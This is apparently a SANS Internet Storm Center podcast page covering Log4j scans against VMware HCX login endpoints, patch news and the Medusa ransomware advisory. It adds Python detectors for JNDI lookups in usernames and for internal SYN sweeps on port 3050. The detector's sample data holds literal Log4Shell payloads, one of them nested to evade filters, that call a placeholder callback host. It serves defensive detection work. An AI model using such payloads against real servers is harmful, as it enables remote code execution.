SANS Stormcast Thursday Mar 13th: Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;
Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9362.mp3

Log4j Scans for VMware Hybrid Cloud Extension (HCX)
An attacker is scanning various login pages, including the authentication endpoint of the VMware HCX REST API, for Log4j vulnerabilities. The attack submits the exploit string as the username, hoping to trigger the vulnerability when Log4j logs the username.
https://isc.sans.edu/diary/Scans%20for%20VMWare%20Hybrid%20Cloud%20Extension%20%28HCX%29%20API%20(Log4j%20-%20not%20brute%20forcing)/31762
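The point of the scan above is that the username is logged before it is authenticated, so the HTTP status of the login attempt says nothing about whether the lookup fired. The following is an added detection example, not code from the ISC diary or from VMware: it runs over a constructed set of login records (the "/api/sessions" path, field names and callback host are placeholders, not HCX's real endpoint or log format), de-nests the lookup forms that are commonly used to split up the "jndi" keyword, and flags every request whose username still contains a JNDI lookup afterwards. It goes slightly beyond the diary by handling nested lookups, not only the plain form.

```python
import re

# Constructed sample of login requests in a simplified JSON-like form. The
# "/api/sessions" path, the field names and the callback host are placeholders
# for illustration, not VMware HCX's actual endpoint or log format.
SAMPLE_REQUESTS = [
    {"src": "192.0.2.10", "path": "/api/sessions", "username": "admin", "status": 401},
    {"src": "198.51.100.7", "path": "/api/sessions",
     "username": "${jndi:ldap://callback.example.invalid/a}", "status": 401},
    {"src": "198.51.100.7", "path": "/login",
     "username": "${${lower:j}ndi:${lower:l}dap://callback.example.invalid/x}", "status": 401},
    {"src": "203.0.113.5", "path": "/api/sessions", "username": "svc_backup", "status": 200},
]

# ${name:arg} lookups whose result is plain text (case transforms) and the
# ${...:-default} form are the nesting tricks that split up the "jndi" keyword
# so that a naive substring match misses it.
LOOKUP_RE = re.compile(r"\$\{([A-Za-z]+):([^${}]*)\}")
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_text_lookup(match):
    """Evaluate lookups that produce literal text; leave everything else intact."""
    name, arg = match.group(1).lower(), match.group(2)
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return match.group(0)  # jndi and unknown lookups are kept as-is


def normalize_lookups(value: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups innermost first until the string stops changing.
    The round limit keeps a pathological input from looping."""
    for _ in range(max_rounds):
        before = value
        value = DEFAULT_RE.sub(lambda m: m.group(1), value)
        value = LOOKUP_RE.sub(_resolve_text_lookup, value)
        if value == before:
            break
    return value


def looks_like_log4shell(value: str) -> bool:
    """True if the value contains a JNDI lookup, directly or after de-nesting."""
    return JNDI_RE.search(normalize_lookups(value)) is not None


def scan_login_records(records):
    """Flag every request whose username field carries a JNDI lookup.
    The HTTP status is deliberately ignored: a 401 does not mean the attempt
    failed, because the lookup fires when the username is logged, not when it
    is authenticated."""
    findings = []
    for rec in records:
        user = rec.get("username", "")
        if looks_like_log4shell(user):
            findings.append({
                "src": rec["src"],
                "path": rec["path"],
                "username": user,
                "normalized": normalize_lookups(user),
            })
    return findings


if __name__ == "__main__":
    for f in scan_login_records(SAMPLE_REQUESTS):
        print(f"{f['src']} -> {f['path']}: {f['normalized']}")
```

Running the block reports the two requests from 198.51.100.7 and nothing for the ordinary usernames. The normalized form is kept in each finding so an analyst sees what the logger would have evaluated, which is more useful for triage than the raw obfuscated string.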
Patch Tuesday Fallout
Yesterday's Apple patch may re-activate Apple Intelligence for users who had earlier disabled it. Microsoft is offering support for users whose USB printers started printing gibberish after a January update was applied.
https://www.macrumors.com/2025/03/11/ios-18-3-2-apple-intelligence-auto-on/
https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22h2#usb-printers-might-print-random-text-with-the-january-2025-preview-update
Adobe Updates
Adobe updated seven different products, including Adobe Acrobat. The Acrobat vulnerabilities may lead to remote code execution, and Adobe rates them critical.
https://helpx.adobe.com/security/security-bulletin.html
Medusa Ransomware
CISA and partner agencies released details about the Medusa Ransomware. The document includes many details useful to defenders.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
Zoom Update
Zoom released a critical update fixing a number of remote code execution vulnerabilities.
https://www.zoom.com/en/trust/security-bulletin/
FreeType Library Vulnerability
https://www.facebook.com/security/advisories/cve-2025-27363
Podcast Transcript
Hello and welcome to the Thursday, March 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida.

One vulnerability that's just not going away is Log4j. The latest example are some scans that I observed today against the VMware Hybrid Cloud Extension, or HCX, API. This is a REST API, and at first I thought it was just a brute force attempt I saw, because the endpoint that the request was directed at, well, was used for login. It's the session, and you just post a username and password to it and you'll get back a session key that's then being used as a bearer token. However, looking at the payload closer, well, the username was actually a Log4j payload. This makes perfect sense, sort of in hindsight, that an attacker would use a username to inject a Log4j payload because, well, that's the part that's usually logged from a request like this. And interestingly, the IP that was going after these VMware systems also went after a couple of other login pages, like some Cisco login pages and others that I yet have to identify. They're sort of just generic, like some just login. So it could be various applications that are being attacked here.

And then we got a little bit of Patch Tuesday cleanup. First of all, the Apple update released yesterday that fixed the zero-day vulnerability in macOS and iOS. Apparently, after applying this update, some users reported that Apple Intelligence is being re-enabled if they had it disabled first. That's Apple's artificial intelligence feature that typically is enabled by default, but you are able to disable it. Well, in Europe, I don't think it's available. So no issue with Europe here. This has been an issue in the last update as well. So nothing really terribly new here. Just be aware. And if you want it disabled, double check that it's still disabled.

Nothing yet I heard about yesterday's Microsoft update, but there are some reports that actually the January update does cause some issues with USB printers. And it does cause them to print gibberish. If you're affected by this, I'll have a link to a statement from Microsoft here in the show notes. And yesterday when I was recording, Adobe had not released its Patch Tuesday update yet. Well, they have been released now. They updated a total of seven different applications. The one that's noteworthy here is Acrobat Reader. Of course, that's an old favorite when it comes to patching. And it fixes a number of critical remote code execution vulnerabilities. So definitely something that you need to apply if you're running Adobe Acrobat Reader.

And CISA, in conjunction with some partner agencies, did publish a report about the Medusa malware. This is a ransomware. I'm always looking first for sort of initial access. In this case, it appears to be phishing. Of course, still very common. ScreenConnect, we talked about this before. And then the Fortinet EMS SQL injection vulnerability. Another sort of interesting TTP here I find is that they see it do some port scans internally. That's something that should sort of pop up in any kind of internal sensor. In particular, some of the odd ports they're scanning, like 3050, the Firebird database port, which isn't used much. So having all of a sudden lots of SYN scans on this port should be something that could trigger an alert. Other than that, a great read as usual. These reports are very useful to, first of all, make sure that you have blocked some of these initial access vectors as much as possible, that you have set up detection for the lateral movement, like these port scans, and then, of course, also just to check if you're not already infected. There are a number of IOCs and such listed in the report.

And then let's look at some other patches. We got, first of all, Zoom released an update, fixing five vulnerabilities. Four of them are rated as high, meaning they lead to remote code execution: buffer overflows, buffer underflow, use after free. Sort of your standard vulnerabilities here. Updated. I find Zoom is pretty good in sort of keeping itself updated. So it shouldn't be a big issue.

And then we got an update for the FreeType library. This is one of those font rendering libraries. Plenty of past vulnerabilities in libraries like this. This could lead to remote code execution. The problem with all these libraries is that, number one, they're everywhere. So you'll have to wait for things like browsers and other display software to be updated. Secondly, there are a lot of fonts being loaded sort of dynamically these days. And that's how a vulnerability like this could possibly be exploited.

Well, and this is it again for today. Thanks for subscribing. Thanks for leaving good reviews. Thanks for telling everybody, friends and enemies, how great this podcast is. And get them to subscribe to it as well. Thanks and talk to you again tomorrow. Bye.
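The Medusa TTP mentioned in the transcript, internal SYN sweeps against rarely used ports such as Firebird's 3050, is a good candidate for a simple internal-sensor rule. The following is an added example, not code from the CISA advisory or from the podcast: it runs over constructed flow records (timestamp, source, destination, destination port, simplified TCP flag string) and raises an alert when one source sends SYN-only probes to at least a threshold number of distinct hosts on a watched port inside a sliding time window. The threshold and window are assumed tuning values, and the flag strings are a simplification of real flow data.

```python
from collections import defaultdict

# Assumed tuning values: which ports to watch, how many distinct destinations
# count as a sweep, and the sliding window length in seconds.
WATCHED_PORTS = {3050}          # Firebird; add other rarely used internal ports as needed
DISTINCT_HOSTS_THRESHOLD = 10
WINDOW_SECONDS = 60

# Constructed flow records: (timestamp, src, dst, dport, flags). "S" stands for
# a SYN-only probe, "SA"/"PA" for packets of an established session.
SAMPLE_FLOWS = (
    # one workstation sweeping 10.0.5.1 through 10.0.5.24 on 3050, one probe per second
    [(100 + i, "10.0.1.23", f"10.0.5.{i}", 3050, "S") for i in range(1, 25)]
    # a legitimate application talking to a single database server
    + [(130, "10.0.2.40", "10.0.5.9", 3050, "SA"), (131, "10.0.2.40", "10.0.5.9", 3050, "PA")]
    # a couple of isolated probes, well below the threshold
    + [(200, "10.0.3.7", "10.0.5.1", 3050, "S"), (260, "10.0.3.7", "10.0.5.2", 3050, "S")]
)


def detect_syn_sweeps(flows, ports=WATCHED_PORTS, threshold=DISTINCT_HOSTS_THRESHOLD,
                      window=WINDOW_SECONDS):
    """Return {src: (window_start_ts, distinct_targets)} for every source whose
    SYN-only flows to a watched port reach `threshold` distinct destinations
    within `window` seconds. Only the first window that trips is reported."""
    per_src = defaultdict(list)
    for ts, src, dst, dport, flags in sorted(flows):
        if dport in ports and flags == "S":
            per_src[src].append((ts, dst))

    alerts = {}
    for src, events in per_src.items():
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it fits inside `window` seconds
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) >= threshold:
                alerts[src] = (events[start][0], len(targets))
                break
    return alerts


if __name__ == "__main__":
    for src, (ts, count) in detect_syn_sweeps(SAMPLE_FLOWS).items():
        print(f"ALERT: {src} probed {count} hosts on {sorted(WATCHED_PORTS)} starting at t={ts}")
```

Counting distinct destinations rather than raw packets keeps a chatty but legitimate client, which hits one server many times, from tripping the rule, while a sweep across a subnet trips it quickly. In a real deployment the list of known database servers would be allowlisted and the threshold tuned to the environment's normal use of the port.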